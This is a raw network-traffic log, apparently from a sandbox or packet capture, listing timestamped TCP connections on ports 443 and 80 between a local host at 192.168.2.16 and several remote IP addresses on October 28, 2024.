                                                                                                                                                Oct 28, 2024 17:47:44.609631062 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.174114943 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.174526930 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.174546957 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.174927950 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.175529957 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.175529957 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.175542116 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.175600052 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.175633907 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.175649881 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.175683975 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.175796986 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.175805092 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.472517014 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.472562075 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.472579002 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.472666025 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.472687960 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.472846031 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.473764896 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.473810911 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.473870039 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.473875999 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.474922895 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.475003958 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.475008011 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.520934105 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.589798927 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.589864969 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.589891911 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.589915037 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.589927912 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.589939117 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.590001106 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.590692997 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.590738058 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.590818882 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.590912104 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.590962887 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.590975046 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.591000080 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.591025114 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:45.594008923 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:45.594064951 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:45.594202995 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:45.594387054 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:45.594408989 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.252823114 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.253134966 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:46.253161907 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.253484011 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.253782988 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:46.253843069 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.253943920 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:46.295341015 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.352489948 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:46.408277035 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.408369064 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:46.409439087 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:46.409605026 CET49753443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:46.409622908 CET44349753104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:51.493663073 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:51.499032974 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:51.499067068 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:51.499181986 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:51.499458075 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:51.499470949 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.139273882 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.139671087 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.139697075 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.140861034 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.141299963 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.141458988 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.141463041 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.141479015 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.141554117 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.141649008 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.141746044 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.141783953 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.702883005 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.702959061 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.702992916 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.703191996 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.703219891 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.703263998 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.703284025 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.703290939 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.703337908 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.703337908 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.703392982 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.703775883 CET49754443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:52.703792095 CET44349754104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.706370115 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:52.706408024 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.706512928 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:52.706765890 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:52.706783056 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.724214077 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:52.724262953 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:52.724461079 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:52.724674940 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:52.724694014 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.568218946 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.568540096 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.568559885 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.568923950 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.569320917 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.569355965 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.569391966 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.589060068 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.589288950 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.589318037 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.590377092 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.590548992 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.590727091 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.590739965 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.590792894 CET44349756188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.590795040 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.590852022 CET49756443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.591100931 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.591147900 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.591228962 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.591398001 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:53.591412067 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.614638090 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.707598925 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.707712889 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:53.707894087 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.708574057 CET49755443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:53.708594084 CET44349755104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.241951942 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.242300987 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.242366076 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.245826006 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.246022940 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.246260881 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.246339083 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.246417046 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.246458054 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.246520996 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.246552944 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.301517963 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.489022970 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.489119053 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.489147902 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.489191055 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.489264011 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.489298105 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.489298105 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.489336014 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.489847898 CET49757443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.489872932 CET44349757188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.492681980 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.492722988 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.492819071 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.493026972 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.493041039 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.505342960 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.505393028 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.505584002 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.505677938 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.505729914 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.505785942 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.506151915 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.506169081 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:54.506406069 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:54.506418943 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.112509012 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.112818003 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.112843990 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.113898993 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.113982916 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114326954 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114350080 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114396095 CET44349760188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.114422083 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114447117 CET49760443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114875078 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.114926100 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.114974976 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.115036964 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.115129948 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.115144968 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.115323067 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.115333080 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.115592003 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.115973949 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.116075039 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.116075993 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.120843887 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.121081114 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.121098042 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.124686956 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.124757051 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125022888 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125035048 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125070095 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125083923 CET44349759188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.125139952 CET49759443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125313997 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125345945 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.125415087 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125601053 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.125614882 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.162509918 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.162522078 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.263269901 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.263365030 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.263434887 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.264164925 CET49758443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.264183044 CET44349758188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.739636898 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.740115881 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.740133047 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.741173029 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.741259098 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.741564035 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.741631031 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.741761923 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.741769075 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.741813898 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.741842031 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.785562992 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.814373016 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.814791918 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.814825058 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.815862894 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.815948009 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.816253901 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.816318989 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.865622997 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.865657091 CET44349762188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:55.913522005 CET49762443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:55.961615086 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:56.043225050 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043376923 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043426991 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043446064 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.043467999 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043510914 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043536901 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.043545008 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043584108 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043587923 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.043597937 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043643951 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.043651104 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043762922 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.043837070 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.044487953 CET49761443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:56.044503927 CET44349761188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.065459967 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.065527916 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.065613985 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.065849066 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.065871954 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.071726084 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.071755886 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.071882963 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.072093010 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.072114944 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.665055037 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.665416956 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.665461063 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.666496992 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.666585922 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.666965961 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.667087078 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.667191029 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.667208910 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.713144064 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.713577032 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.713578939 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.713597059 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.714989901 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.715065002 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.716133118 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.716279030 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.716332912 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.760552883 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.760560989 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.808680058 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.815566063 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.815642118 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.815701962 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.816190958 CET49763443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.816220999 CET44349763104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.817979097 CET49765443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.818057060 CET44349765104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.818151951 CET49765443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.818401098 CET49765443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:56.818439007 CET44349765104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867131948 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867230892 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867278099 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867300987 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.867331028 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867373943 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867377043 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.867388964 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867460012 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.867466927 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867511034 CET44349764151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.867549896 CET49764443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:47:56.867556095 CET44349764151.101.66.137192.168.2.16
